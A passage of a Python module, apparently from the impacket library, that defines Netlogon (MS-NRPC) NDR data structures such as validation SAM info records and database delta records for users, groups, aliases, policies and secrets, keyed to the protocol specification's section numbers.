 601 | class NETLOGON_LOGON_INFO_CLASS(NDRENUM):
 602 |     class enumItems(Enum):
 603 |         NetlogonInteractiveInformation           = 1
 604 |         NetlogonNetworkInformation               = 2
 605 |         NetlogonServiceInformation               = 3
 606 |         NetlogonGenericInformation               = 4
 607 |         NetlogonInteractiveTransitiveInformation = 5
 608 |         NetlogonNetworkTransitiveInformation     = 6
 609 |         NetlogonServiceTransitiveInformation     = 7
 610 | 
 611 | # 2.2.1.4.6 NETLOGON_LEVEL
 612 | class NETLOGON_LEVEL(NDRUNION):
 613 |     union = {
 614 |         NETLOGON_LOGON_INFO_CLASS.NetlogonInteractiveInformation           : ('LogonInteractive', PNETLOGON_INTERACTIVE_INFO),
 615 |         NETLOGON_LOGON_INFO_CLASS.NetlogonInteractiveTransitiveInformation : ('LogonInteractiveTransitive', PNETLOGON_INTERACTIVE_INFO),
 616 |         NETLOGON_LOGON_INFO_CLASS.NetlogonServiceInformation               : ('LogonService', PNETLOGON_SERVICE_INFO),
 617 |         NETLOGON_LOGON_INFO_CLASS.NetlogonServiceTransitiveInformation     : ('LogonServiceTransitive', PNETLOGON_SERVICE_INFO),
 618 |         NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkInformation               : ('LogonNetwork', PNETLOGON_NETWORK_INFO),
 619 |         NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation     : ('LogonNetworkTransitive', PNETLOGON_NETWORK_INFO),
 620 |         NETLOGON_LOGON_INFO_CLASS.NetlogonGenericInformation               : ('LogonGeneric', PNETLOGON_GENERIC_INFO),
 621 |     }
 622 | 
 623 | # 2.2.1.4.7 NETLOGON_SID_AND_ATTRIBUTES
 624 | class NETLOGON_SID_AND_ATTRIBUTES(NDRSTRUCT):
 625 |     structure = (
 626 |         ('Sid', PRPC_SID),
 627 |         ('Attributes', ULONG),
 628 |     )
 629 | 
 630 | # 2.2.1.4.8 NETLOGON_VALIDATION_GENERIC_INFO2
 631 | class NETLOGON_VALIDATION_GENERIC_INFO2(NDRSTRUCT):
 632 |     structure = (
 633 |         ('DataLength', ULONG),
 634 |         ('ValidationData', PUCHAR_ARRAY),
 635 |     )
 636 | 
 637 | class PNETLOGON_VALIDATION_GENERIC_INFO2(NDRPOINTER):
 638 |     referent = (
 639 |         ('Data', NETLOGON_VALIDATION_GENERIC_INFO2),
 640 |     )
 641 | 
 642 | # 2.2.1.4.9 USER_SESSION_KEY
 643 | USER_SESSION_KEY = LM_OWF_PASSWORD
 644 | 
 645 | # 2.2.1.4.10 GROUP_MEMBERSHIP
 646 | class GROUP_MEMBERSHIP(NDRSTRUCT):
 647 |     structure = (
 648 |         ('RelativeId', ULONG),
 649 |         ('Attributes', ULONG),
 650 |     )
 651 | 
 652 | class GROUP_MEMBERSHIP_ARRAY(NDRUniConformantArray):
 653 |     item = GROUP_MEMBERSHIP
 654 | 
 655 | class PGROUP_MEMBERSHIP_ARRAY(NDRPOINTER):
 656 |     referent = (
 657 |         ('Data', GROUP_MEMBERSHIP_ARRAY),
 658 |     )
 659 | 
 660 | # 2.2.1.4.11 NETLOGON_VALIDATION_SAM_INFO
 661 | class LONG_ARRAY(NDRUniFixedArray):
 662 |     def getDataLen(self, data, offset=0):
 663 |         return 4*10
 664 | 
 665 | class NETLOGON_VALIDATION_SAM_INFO(NDRSTRUCT):
 666 |     structure = (
 667 |         ('LogonTime', OLD_LARGE_INTEGER),
 668 |         ('LogoffTime', OLD_LARGE_INTEGER),
 669 |         ('KickOffTime', OLD_LARGE_INTEGER),
 670 |         ('PasswordLastSet', OLD_LARGE_INTEGER),
 671 |         ('PasswordCanChange', OLD_LARGE_INTEGER),
 672 |         ('PasswordMustChange', OLD_LARGE_INTEGER),
 673 |         ('EffectiveName', RPC_UNICODE_STRING),
 674 |         ('FullName', RPC_UNICODE_STRING),
 675 |         ('LogonScript', RPC_UNICODE_STRING),
 676 |         ('ProfilePath', RPC_UNICODE_STRING),
 677 |         ('HomeDirectory', RPC_UNICODE_STRING),
 678 |         ('HomeDirectoryDrive', RPC_UNICODE_STRING),
 679 |         ('LogonCount', USHORT),
 680 |         ('BadPasswordCount', USHORT),
 681 |         ('UserId', ULONG),
 682 |         ('PrimaryGroupId', ULONG),
 683 |         ('GroupCount', ULONG),
 684 |         ('GroupIds', PGROUP_MEMBERSHIP_ARRAY),
 685 |         ('UserFlags', ULONG),
 686 |         ('UserSessionKey', USER_SESSION_KEY),
 687 |         ('LogonServer', RPC_UNICODE_STRING),
 688 |         ('LogonDomainName', RPC_UNICODE_STRING),
 689 |         ('LogonDomainId', PRPC_SID),
 690 |         ('ExpansionRoom', LONG_ARRAY),
 691 |     )
 692 | 
 693 | class PNETLOGON_VALIDATION_SAM_INFO(NDRPOINTER):
 694 |     referent = (
 695 |         ('Data', NETLOGON_VALIDATION_SAM_INFO),
 696 |     )
 697 | 
 698 | # 2.2.1.4.12 NETLOGON_VALIDATION_SAM_INFO2
 699 | class NETLOGON_SID_AND_ATTRIBUTES_ARRAY(NDRUniConformantArray):
 700 |     item = NETLOGON_SID_AND_ATTRIBUTES
 701 | 
 702 | class PNETLOGON_SID_AND_ATTRIBUTES_ARRAY(NDRPOINTER):
 703 |     referent = (
 704 |         ('Data', NETLOGON_SID_AND_ATTRIBUTES_ARRAY),
 705 |     )
 706 | 
 707 | class NETLOGON_VALIDATION_SAM_INFO2(NDRSTRUCT):
 708 |     structure = (
 709 |         ('LogonTime', OLD_LARGE_INTEGER),
 710 |         ('LogoffTime', OLD_LARGE_INTEGER),
 711 |         ('KickOffTime', OLD_LARGE_INTEGER),
 712 |         ('PasswordLastSet', OLD_LARGE_INTEGER),
 713 |         ('PasswordCanChange', OLD_LARGE_INTEGER),
 714 |         ('PasswordMustChange', OLD_LARGE_INTEGER),
 715 |         ('EffectiveName', RPC_UNICODE_STRING),
 716 |         ('FullName', RPC_UNICODE_STRING),
 717 |         ('LogonScript', RPC_UNICODE_STRING),
 718 |         ('ProfilePath', RPC_UNICODE_STRING),
 719 |         ('HomeDirectory', RPC_UNICODE_STRING),
 720 |         ('HomeDirectoryDrive', RPC_UNICODE_STRING),
 721 |         ('LogonCount', USHORT),
 722 |         ('BadPasswordCount', USHORT),
 723 |         ('UserId', ULONG),
 724 |         ('PrimaryGroupId', ULONG),
 725 |         ('GroupCount', ULONG),
 726 |         ('GroupIds', PGROUP_MEMBERSHIP_ARRAY),
 727 |         ('UserFlags', ULONG),
 728 |         ('UserSessionKey', USER_SESSION_KEY),
 729 |         ('LogonServer', RPC_UNICODE_STRING),
 730 |         ('LogonDomainName', RPC_UNICODE_STRING),
 731 |         ('LogonDomainId', PRPC_SID),
 732 |         ('ExpansionRoom', LONG_ARRAY),
 733 |         ('SidCount', ULONG),
 734 |         ('ExtraSids', PNETLOGON_SID_AND_ATTRIBUTES_ARRAY),
 735 |     )
 736 | 
 737 | class PNETLOGON_VALIDATION_SAM_INFO2(NDRPOINTER):
 738 |     referent = (
 739 |         ('Data', NETLOGON_VALIDATION_SAM_INFO2),
 740 |     )
 741 | 
 742 | # 2.2.1.4.13 NETLOGON_VALIDATION_SAM_INFO4
 743 | class NETLOGON_VALIDATION_SAM_INFO4(NDRSTRUCT):
 744 |     structure = (
 745 |         ('LogonTime', OLD_LARGE_INTEGER),
 746 |         ('LogoffTime', OLD_LARGE_INTEGER),
 747 |         ('KickOffTime', OLD_LARGE_INTEGER),
 748 |         ('PasswordLastSet', OLD_LARGE_INTEGER),
 749 |         ('PasswordCanChange', OLD_LARGE_INTEGER),
 750 |         ('PasswordMustChange', OLD_LARGE_INTEGER),
 751 |         ('EffectiveName', RPC_UNICODE_STRING),
 752 |         ('FullName', RPC_UNICODE_STRING),
 753 |         ('LogonScript', RPC_UNICODE_STRING),
 754 |         ('ProfilePath', RPC_UNICODE_STRING),
 755 |         ('HomeDirectory', RPC_UNICODE_STRING),
 756 |         ('HomeDirectoryDrive', RPC_UNICODE_STRING),
 757 |         ('LogonCount', USHORT),
 758 |         ('BadPasswordCount', USHORT),
 759 |         ('UserId', ULONG),
 760 |         ('PrimaryGroupId', ULONG),
 761 |         ('GroupCount', ULONG),
 762 |         ('GroupIds', PGROUP_MEMBERSHIP_ARRAY),
 763 |         ('UserFlags', ULONG),
 764 |         ('UserSessionKey', USER_SESSION_KEY),
 765 |         ('LogonServer', RPC_UNICODE_STRING),
 766 |         ('LogonDomainName', RPC_UNICODE_STRING),
 767 |         ('LogonDomainId', PRPC_SID),
 768 | 
 769 |         ('LMKey', CHAR_FIXED_8_ARRAY),
 770 |         ('UserAccountControl', ULONG),
 771 |         ('SubAuthStatus', ULONG),
 772 |         ('LastSuccessfulILogon', OLD_LARGE_INTEGER),
 773 |         ('LastFailedILogon', OLD_LARGE_INTEGER),
 774 |         ('FailedILogonCount', ULONG),
 775 |         ('Reserved4', ULONG),
 776 | 
 777 |         ('SidCount', ULONG),
 778 |         ('ExtraSids', PNETLOGON_SID_AND_ATTRIBUTES_ARRAY),
 779 |         ('DnsLogonDomainName', RPC_UNICODE_STRING),
 780 |         ('Upn', RPC_UNICODE_STRING),
 781 |         ('ExpansionString1', RPC_UNICODE_STRING),
 782 |         ('ExpansionString2', RPC_UNICODE_STRING),
 783 |         ('ExpansionString3', RPC_UNICODE_STRING),
 784 |         ('ExpansionString4', RPC_UNICODE_STRING),
 785 |         ('ExpansionString5', RPC_UNICODE_STRING),
 786 |         ('ExpansionString6', RPC_UNICODE_STRING),
 787 |         ('ExpansionString7', RPC_UNICODE_STRING),
 788 |         ('ExpansionString8', RPC_UNICODE_STRING),
 789 |         ('ExpansionString9', RPC_UNICODE_STRING),
 790 |         ('ExpansionString10', RPC_UNICODE_STRING),
 791 |     )
 792 | 
 793 | class PNETLOGON_VALIDATION_SAM_INFO4(NDRPOINTER):
 794 |     referent = (
 795 |         ('Data', NETLOGON_VALIDATION_SAM_INFO4),
 796 |     )
 797 | 
 798 | # 2.2.1.4.17 NETLOGON_VALIDATION_INFO_CLASS
 799 | class NETLOGON_VALIDATION_INFO_CLASS(NDRENUM):
 800 |     class enumItems(Enum):
 801 |         NetlogonValidationUasInfo      = 1
 802 |         NetlogonValidationSamInfo      = 2
 803 |         NetlogonValidationSamInfo2     = 3
 804 |         NetlogonValidationGenericInfo  = 4
 805 |         NetlogonValidationGenericInfo2 = 5
 806 |         NetlogonValidationSamInfo4     = 6
 807 | 
 808 | # 2.2.1.4.14 NETLOGON_VALIDATION
 809 | class NETLOGON_VALIDATION(NDRUNION):
 810 |     union = {
 811 |         NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo     : ('ValidationSam', PNETLOGON_VALIDATION_SAM_INFO),
 812 |         NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo2    : ('ValidationSam2', PNETLOGON_VALIDATION_SAM_INFO2),
 813 |         NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationGenericInfo2: ('ValidationGeneric2', PNETLOGON_VALIDATION_GENERIC_INFO2),
 814 |         NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4    : ('ValidationSam4', PNETLOGON_VALIDATION_SAM_INFO4),
 815 |     }
 816 | 
 817 | # 2.2.1.5.2 NLPR_QUOTA_LIMITS
 818 | class NLPR_QUOTA_LIMITS(NDRSTRUCT):
 819 |     structure = (
 820 |         ('PagedPoolLimit', ULONG),
 821 |         ('NonPagedPoolLimit', ULONG),
 822 |         ('MinimumWorkingSetSize', ULONG),
 823 |         ('MaximumWorkingSetSize', ULONG),
 824 |         ('PagefileLimit', ULONG),
 825 |         ('Reserved', OLD_LARGE_INTEGER),
 826 |     )
 827 | 
 828 | # 2.2.1.5.3 NETLOGON_DELTA_ACCOUNTS
 829 | class ULONG_ARRAY(NDRUniConformantArray):
 830 |     item = ULONG
 831 | 
 832 | class PULONG_ARRAY(NDRPOINTER):
 833 |     referent = (
 834 |         ('Data', ULONG_ARRAY),
 835 |     )
 836 | 
 837 | class NETLOGON_DELTA_ACCOUNTS(NDRSTRUCT):
 838 |     structure = (
 839 |         ('PrivilegeEntries', ULONG),
 840 |         ('PrivilegeControl', ULONG),
 841 |         ('PrivilegeAttributes', PULONG_ARRAY),
 842 |         ('PrivilegeNames', PRPC_UNICODE_STRING_ARRAY),
 843 |         ('QuotaLimits', NLPR_QUOTA_LIMITS),
 844 |         ('SystemAccessFlags', ULONG),
 845 |         ('SecurityInformation', SECURITY_INFORMATION),
 846 |         ('SecuritySize', ULONG),
 847 |         ('SecurityDescriptor', PUCHAR_ARRAY),
 848 |         ('DummyString1', RPC_UNICODE_STRING),
 849 |         ('DummyString2', RPC_UNICODE_STRING),
 850 |         ('DummyString3', RPC_UNICODE_STRING),
 851 |         ('DummyString4', RPC_UNICODE_STRING),
 852 |         ('DummyLong1', ULONG),
 853 |         ('DummyLong2', ULONG),
 854 |         ('DummyLong3', ULONG),
 855 |         ('DummyLong4', ULONG),
 856 |     )
 857 | 
 858 | class PNETLOGON_DELTA_ACCOUNTS(NDRPOINTER):
 859 |     referent = (
 860 |         ('Data', NETLOGON_DELTA_ACCOUNTS),
 861 |     )
 862 | 
 863 | # 2.2.1.5.5 NLPR_SID_INFORMATION
 864 | class NLPR_SID_INFORMATION(NDRSTRUCT):
 865 |     structure = (
 866 |         ('SidPointer', PRPC_SID),
 867 |     )
 868 | 
 869 | # 2.2.1.5.6 NLPR_SID_ARRAY
 870 | class NLPR_SID_INFORMATION_ARRAY(NDRUniConformantArray):
 871 |     item = NLPR_SID_INFORMATION
 872 | 
 873 | class PNLPR_SID_INFORMATION_ARRAY(NDRPOINTER):
 874 |     referent = (
 875 |         ('Data', NLPR_SID_INFORMATION_ARRAY),
 876 |     )
 877 | 
 878 | class NLPR_SID_ARRAY(NDRSTRUCT):
 879 |     referent = (
 880 |         ('Count', ULONG),
 881 |         ('Sids', PNLPR_SID_INFORMATION_ARRAY),
 882 |     )
 883 | 
 884 | # 2.2.1.5.7 NETLOGON_DELTA_ALIAS_MEMBER
 885 | class NETLOGON_DELTA_ALIAS_MEMBER(NDRSTRUCT):
 886 |     structure = (
 887 |         ('Members', NLPR_SID_ARRAY),
 888 |         ('DummyLong1', ULONG),
 889 |         ('DummyLong2', ULONG),
 890 |         ('DummyLong3', ULONG),
 891 |         ('DummyLong4', ULONG),
 892 |     )
 893 | 
 894 | class PNETLOGON_DELTA_ALIAS_MEMBER(NDRPOINTER):
 895 |     referent = (
 896 |         ('Data', NETLOGON_DELTA_ALIAS_MEMBER),
 897 |     )
 898 | 
 899 | # 2.2.1.5.8 NETLOGON_DELTA_DELETE_GROUP
 900 | class NETLOGON_DELTA_DELETE_GROUP(NDRSTRUCT):
 901 |     structure = (
 902 |         ('AccountName', LPWSTR),
 903 |         ('DummyString1', RPC_UNICODE_STRING),
 904 |         ('DummyString2', RPC_UNICODE_STRING),
 905 |         ('DummyString3', RPC_UNICODE_STRING),
 906 |         ('DummyString4', RPC_UNICODE_STRING),
 907 |         ('DummyLong1', ULONG),
 908 |         ('DummyLong2', ULONG),
 909 |         ('DummyLong3', ULONG),
 910 |         ('DummyLong4', ULONG),
 911 |     )
 912 | 
 913 | class PNETLOGON_DELTA_DELETE_GROUP(NDRPOINTER):
 914 |     referent = (
 915 |         ('Data', NETLOGON_DELTA_DELETE_GROUP),
 916 |     )
 917 | 
 918 | # 2.2.1.5.9 NETLOGON_DELTA_DELETE_USER
 919 | class NETLOGON_DELTA_DELETE_USER(NDRSTRUCT):
 920 |     structure = (
 921 |         ('AccountName', LPWSTR),
 922 |         ('DummyString1', RPC_UNICODE_STRING),
 923 |         ('DummyString2', RPC_UNICODE_STRING),
 924 |         ('DummyString3', RPC_UNICODE_STRING),
 925 |         ('DummyString4', RPC_UNICODE_STRING),
 926 |         ('DummyLong1', ULONG),
 927 |         ('DummyLong2', ULONG),
 928 |         ('DummyLong3', ULONG),
 929 |         ('DummyLong4', ULONG),
 930 |     )
 931 | 
 932 | class PNETLOGON_DELTA_DELETE_USER(NDRPOINTER):
 933 |     referent = (
 934 |         ('Data', NETLOGON_DELTA_DELETE_USER),
 935 |     )
 936 | 
 937 | # 2.2.1.5.10 NETLOGON_DELTA_DOMAIN
 938 | class NETLOGON_DELTA_DOMAIN(NDRSTRUCT):
 939 |     structure = (
 940 |         ('DomainName', RPC_UNICODE_STRING),
 941 |         ('OemInformation', RPC_UNICODE_STRING),
 942 |         ('ForceLogoff', OLD_LARGE_INTEGER),
 943 |         ('MinPasswordLength', USHORT),
 944 |         ('PasswordHistoryLength', USHORT),
 945 |         ('MaxPasswordAge', OLD_LARGE_INTEGER),
 946 |         ('MinPasswordAge', OLD_LARGE_INTEGER),
 947 |         ('DomainModifiedCount', OLD_LARGE_INTEGER),
 948 |         ('DomainCreationTime', OLD_LARGE_INTEGER),
 949 |         ('SecurityInformation', SECURITY_INFORMATION),
 950 |         ('SecuritySize', ULONG),
 951 |         ('SecurityDescriptor', PUCHAR_ARRAY),
 952 |         ('DomainLockoutInformation', RPC_UNICODE_STRING),
 953 |         ('DummyString2', RPC_UNICODE_STRING),
 954 |         ('DummyString3', RPC_UNICODE_STRING),
 955 |         ('DummyString4', RPC_UNICODE_STRING),
 956 |         ('PasswordProperties', ULONG),
 957 |         ('DummyLong2', ULONG),
 958 |         ('DummyLong3', ULONG),
 959 |         ('DummyLong4', ULONG),
 960 |     )
 961 | 
 962 | class PNETLOGON_DELTA_DOMAIN(NDRPOINTER):
 963 |     referent = (
 964 |         ('Data', NETLOGON_DELTA_DOMAIN),
 965 |     )
 966 | 
 967 | # 2.2.1.5.13 NETLOGON_DELTA_GROUP
 968 | class NETLOGON_DELTA_GROUP(NDRSTRUCT):
 969 |     structure = (
 970 |         ('Name', RPC_UNICODE_STRING),
 971 |         ('RelativeId', ULONG),
 972 |         ('Attributes', ULONG),
 973 |         ('AdminComment', RPC_UNICODE_STRING),
 974 |         ('SecurityInformation', USHORT),
 975 |         ('SecuritySize', ULONG),
 976 |         ('SecurityDescriptor', SECURITY_INFORMATION),
 977 |         ('DummyString1', RPC_UNICODE_STRING),
 978 |         ('DummyString2', RPC_UNICODE_STRING),
 979 |         ('DummyString3', RPC_UNICODE_STRING),
 980 |         ('DummyString4', RPC_UNICODE_STRING),
 981 |         ('DummyLong1', ULONG),
 982 |         ('DummyLong2', ULONG),
 983 |         ('DummyLong3', ULONG),
 984 |         ('DummyLong4', ULONG),
 985 |     )
 986 | 
 987 | class PNETLOGON_DELTA_GROUP(NDRPOINTER):
 988 |     referent = (
 989 |         ('Data', NETLOGON_DELTA_GROUP),
 990 |     )
 991 | 
 992 | # 2.2.1.5.24 NETLOGON_RENAME_GROUP
 993 | class NETLOGON_RENAME_GROUP(NDRSTRUCT):
 994 |     structure = (
 995 |         ('OldName', RPC_UNICODE_STRING),
 996 |         ('NewName', RPC_UNICODE_STRING),
 997 |         ('DummyString1', RPC_UNICODE_STRING),
 998 |         ('DummyString2', RPC_UNICODE_STRING),
 999 |         ('DummyString3', RPC_UNICODE_STRING),
1000 |         ('DummyString4', RPC_UNICODE_STRING),
1001 |         ('DummyLong1', ULONG),
1002 |         ('DummyLong2', ULONG),
1003 |         ('DummyLong3', ULONG),
1004 |         ('DummyLong4', ULONG),
1005 |     )
1006 | 
1007 | class PNETLOGON_DELTA_RENAME_GROUP(NDRPOINTER):
1008 |     referent = (
1009 |         ('Data', NETLOGON_RENAME_GROUP),
1010 |     )
1011 | 
1012 | # 2.2.1.5.14 NLPR_LOGON_HOURS
1013 | from impacket.dcerpc.v5.samr import SAMPR_LOGON_HOURS
1014 | NLPR_LOGON_HOURS = SAMPR_LOGON_HOURS
1015 | 
1016 | # 2.2.1.5.15 NLPR_USER_PRIVATE_INFO
1017 | class NLPR_USER_PRIVATE_INFO(NDRSTRUCT):
1018 |     structure = (
1019 |         ('SensitiveData', UCHAR),
1020 |         ('DataLength', ULONG),
1021 |         ('Data', PUCHAR_ARRAY),
1022 |     )
1023 | 
1024 | # 2.2.1.5.16 NETLOGON_DELTA_USER
1025 | class NETLOGON_DELTA_USER(NDRSTRUCT):
1026 |     structure = (
1027 |         ('UserName', RPC_UNICODE_STRING),
1028 |         ('FullName', RPC_UNICODE_STRING),
1029 |         ('UserId', ULONG),
1030 |         ('PrimaryGroupId', ULONG),
1031 |         ('HomeDirectory', RPC_UNICODE_STRING),
1032 |         ('HomeDirectoryDrive', RPC_UNICODE_STRING),
1033 |         ('ScriptPath', RPC_UNICODE_STRING),
1034 |         ('AdminComment', RPC_UNICODE_STRING),
1035 |         ('WorkStations', RPC_UNICODE_STRING),
1036 |         ('LastLogon', OLD_LARGE_INTEGER),
1037 |         ('LastLogoff', OLD_LARGE_INTEGER),
1038 |         ('LogonHours', NLPR_LOGON_HOURS),
1039 |         ('BadPasswordCount', USHORT),
1040 |         ('LogonCount', USHORT),
1041 |         ('PasswordLastSet', OLD_LARGE_INTEGER),
1042 |         ('AccountExpires', OLD_LARGE_INTEGER),
1043 |         ('UserAccountControl', ULONG),
1044 |         ('EncryptedNtOwfPassword', PUCHAR_ARRAY),
1045 |         ('EncryptedLmOwfPassword', PUCHAR_ARRAY),
1046 |         ('NtPasswordPresent', UCHAR),
1047 |         ('LmPasswordPresent', UCHAR),
1048 |         ('PasswordExpired', UCHAR),
1049 |         ('UserComment', RPC_UNICODE_STRING),
1050 |         ('Parameters', RPC_UNICODE_STRING),
1051 |         ('CountryCode', USHORT),
1052 |         ('CodePage', USHORT),
1053 |         ('PrivateData', NLPR_USER_PRIVATE_INFO),
1054 |         ('SecurityInformation', SECURITY_INFORMATION),
1055 |         ('SecuritySize', ULONG),
1056 |         ('SecurityDescriptor', PUCHAR_ARRAY),
1057 |         ('ProfilePath', RPC_UNICODE_STRING),
1058 |         ('DummyString2', RPC_UNICODE_STRING),
1059 |         ('DummyString3', RPC_UNICODE_STRING),
1060 |         ('DummyString4', RPC_UNICODE_STRING),
1061 |         ('DummyLong1', ULONG),
1062 |         ('DummyLong2', ULONG),
1063 |         ('DummyLong3', ULONG),
1064 |         ('DummyLong4', ULONG),
1065 |     )
1066 | 
1067 | class PNETLOGON_DELTA_USER(NDRPOINTER):
1068 |     referent = (
1069 |         ('Data', NETLOGON_DELTA_USER),
1070 |     )
1071 | 
1072 | # 2.2.1.5.25 NETLOGON_RENAME_USER
1073 | class NETLOGON_RENAME_USER(NDRSTRUCT):
1074 |     structure = (
1075 |         ('OldName', RPC_UNICODE_STRING),
1076 |         ('NewName', RPC_UNICODE_STRING),
1077 |         ('DummyString1', RPC_UNICODE_STRING),
1078 |         ('DummyString2', RPC_UNICODE_STRING),
1079 |         ('DummyString3', RPC_UNICODE_STRING),
1080 |         ('DummyString4', RPC_UNICODE_STRING),
1081 |         ('DummyLong1', ULONG),
1082 |         ('DummyLong2', ULONG),
1083 |         ('DummyLong3', ULONG),
1084 |         ('DummyLong4', ULONG),
1085 |     )
1086 | 
1087 | class PNETLOGON_DELTA_RENAME_USER(NDRPOINTER):
1088 |     referent = (
1089 |         ('Data', NETLOGON_RENAME_USER),
1090 |     )
1091 | 
1092 | # 2.2.1.5.17 NETLOGON_DELTA_GROUP_MEMBER
1093 | class NETLOGON_DELTA_GROUP_MEMBER(NDRSTRUCT):
1094 |     structure = (
1095 |         ('Members', PULONG_ARRAY),
1096 |         ('Attributes', PULONG_ARRAY),
1097 |         ('MemberCount', ULONG),
1098 |         ('DummyLong1', ULONG),
1099 |         ('DummyLong2', ULONG),
1100 |         ('DummyLong3', ULONG),
1101 |         ('DummyLong4', ULONG),
1102 |     )
1103 | 
1104 | class PNETLOGON_DELTA_GROUP_MEMBER(NDRPOINTER):
1105 |     referent = (
1106 |         ('Data', NETLOGON_DELTA_GROUP_MEMBER),
1107 |     )
1108 | 
1109 | # 2.2.1.5.4 NETLOGON_DELTA_ALIAS
1110 | class NETLOGON_DELTA_ALIAS(NDRSTRUCT):
1111 |     structure = (
1112 |         ('Name', RPC_UNICODE_STRING),
1113 |         ('RelativeId', ULONG),
1114 |         ('SecurityInformation', SECURITY_INFORMATION),
1115 |         ('SecuritySize', ULONG),
1116 |         ('SecurityDescriptor', PUCHAR_ARRAY),
1117 |         ('Comment', RPC_UNICODE_STRING),
1118 |         ('DummyString2', RPC_UNICODE_STRING),
1119 |         ('DummyString3', RPC_UNICODE_STRING),
1120 |         ('DummyString4', RPC_UNICODE_STRING),
1121 |         ('DummyLong1', ULONG),
1122 |         ('DummyLong2', ULONG),
1123 |         ('DummyLong3', ULONG),
1124 |         ('DummyLong4', ULONG),
1125 |     )
1126 | 
1127 | class PNETLOGON_DELTA_ALIAS(NDRPOINTER):
1128 |     referent = (
1129 |         ('Data', NETLOGON_DELTA_ALIAS),
1130 |     )
1131 | 
1132 | # 2.2.1.5.23 NETLOGON_RENAME_ALIAS
1133 | class NETLOGON_RENAME_ALIAS(NDRSTRUCT):
1134 |     structure = (
1135 |         ('OldName', RPC_UNICODE_STRING),
1136 |         ('NewName', RPC_UNICODE_STRING),
1137 |         ('DummyString1', RPC_UNICODE_STRING),
1138 |         ('DummyString2', RPC_UNICODE_STRING),
1139 |         ('DummyString3', RPC_UNICODE_STRING),
1140 |         ('DummyString4', RPC_UNICODE_STRING),
1141 |         ('DummyLong1', ULONG),
1142 |         ('DummyLong2', ULONG),
1143 |         ('DummyLong3', ULONG),
1144 |         ('DummyLong4', ULONG),
1145 |     )
1146 | 
1147 | class PNETLOGON_DELTA_RENAME_ALIAS(NDRPOINTER):
1148 |     referent = (
1149 |         ('Data', NETLOGON_RENAME_ALIAS),
1150 |     )
1151 | 
1152 | # 2.2.1.5.19 NETLOGON_DELTA_POLICY
1153 | class NETLOGON_DELTA_POLICY(NDRSTRUCT):
1154 |     structure = (
1155 |         ('MaximumLogSize', ULONG),
1156 |         ('AuditRetentionPeriod', OLD_LARGE_INTEGER),
1157 |         ('AuditingMode', UCHAR),
1158 |         ('MaximumAuditEventCount', ULONG),
1159 |         ('EventAuditingOptions', PULONG_ARRAY),
1160 |         ('PrimaryDomainName', RPC_UNICODE_STRING),
1161 |         ('PrimaryDomainSid', PRPC_SID),
1162 |         ('QuotaLimits', NLPR_QUOTA_LIMITS),
1163 |         ('ModifiedId', OLD_LARGE_INTEGER),
1164 |         ('DatabaseCreationTime', OLD_LARGE_INTEGER),
1165 |         ('SecurityInformation', SECURITY_INFORMATION),
1166 |         ('SecuritySize', ULONG),
1167 |         ('SecurityDescriptor', PUCHAR_ARRAY),
1168 |         ('DummyString1', RPC_UNICODE_STRING),
1169 |         ('DummyString2', RPC_UNICODE_STRING),
1170 |         ('DummyString3', RPC_UNICODE_STRING),
1171 |         ('DummyString4', RPC_UNICODE_STRING),
1172 |         ('DummyLong1', ULONG),
1173 |         ('DummyLong2', ULONG),
1174 |         ('DummyLong3', ULONG),
1175 |         ('DummyLong4', ULONG),
1176 |     )
1177 | 
1178 | class PNETLOGON_DELTA_POLICY(NDRPOINTER):
1179 |     referent = (
1180 |         ('Data', NETLOGON_DELTA_POLICY),
1181 |     )
1182 | 
1183 | # 2.2.1.5.22 NETLOGON_DELTA_TRUSTED_DOMAINS
1184 | class NETLOGON_DELTA_TRUSTED_DOMAINS(NDRSTRUCT):
1185 |     structure = (
1186 |         ('DomainName', RPC_UNICODE_STRING),
1187 |         ('NumControllerEntries', ULONG),
1188 |         ('ControllerNames', PRPC_UNICODE_STRING_ARRAY),
1189 |         ('SecurityInformation', SECURITY_INFORMATION),
1190 |         ('SecuritySize', ULONG),
1191 |         ('SecurityDescriptor', PUCHAR_ARRAY),
1192 |         ('DummyString1', RPC_UNICODE_STRING),
1193 |         ('DummyString2', RPC_UNICODE_STRING),
1194 |         ('DummyString3', RPC_UNICODE_STRING),
1195 |         ('DummyString4', RPC_UNICODE_STRING),
1196 |         ('DummyLong1', ULONG),
1197 |         ('DummyLong2', ULONG),
1198 |         ('DummyLong3', ULONG),
1199 |         ('DummyLong4', ULONG),
1200 |     )
1201 | 
1202 | class PNETLOGON_DELTA_TRUSTED_DOMAINS(NDRPOINTER):
1203 |     referent = (
1204 |         ('Data', NETLOGON_DELTA_TRUSTED_DOMAINS),
1205 |     )
1206 | 
1207 | # 2.2.1.5.20 NLPR_CR_CIPHER_VALUE
1208 | class UCHAR_ARRAY2(NDRUniConformantVaryingArray):
1209 |     item = UCHAR
1210 | 
1211 | class PUCHAR_ARRAY2(NDRPOINTER):
1212 |     referent = (
1213 |         ('Data', UCHAR_ARRAY2),
1214 |     )
1215 | 
1216 | class NLPR_CR_CIPHER_VALUE(NDRSTRUCT):
1217 |     structure = (
1218 |         ('Length', ULONG),
1219 |         ('MaximumLength', ULONG),
1220 |         ('Buffer', PUCHAR_ARRAY2),
1221 |     )
1222 | 
1223 | # 2.2.1.5.21 NETLOGON_DELTA_SECRET
1224 | class NETLOGON_DELTA_SECRET(NDRSTRUCT):
1225 |     structure = (
1226 |         ('CurrentValue', NLPR_CR_CIPHER_VALUE),
1227 |         ('CurrentValueSetTime', OLD_LARGE_INTEGER),
1228 |         ('OldValue', NLPR_CR_CIPHER_VALUE),
1229 |         ('OldValueSetTime', OLD_LARGE_INTEGER),
1230 |         ('SecurityInformation', SECURITY_INFORMATION),
1231 |         ('SecuritySize', ULONG),
1232 |         ('SecurityDescriptor', PUCHAR_ARRAY),
1233 |         ('DummyString1', RPC_UNICODE_STRING),
1234 |         ('DummyString2', RPC_UNICODE_STRING),
1235 |         ('DummyString3', RPC_UNICODE_STRING),
1236 |         ('DummyString4', RPC_UNICODE_STRING),
1237 |         ('DummyLong1', ULONG),
1238 |         ('DummyLong2', ULONG),
1239 |         ('DummyLong3', ULONG),
1240 |         ('DummyLong4', ULONG),
1241 |     )
1242 | 
1243 | class PNETLOGON_DELTA_SECRET(NDRPOINTER):
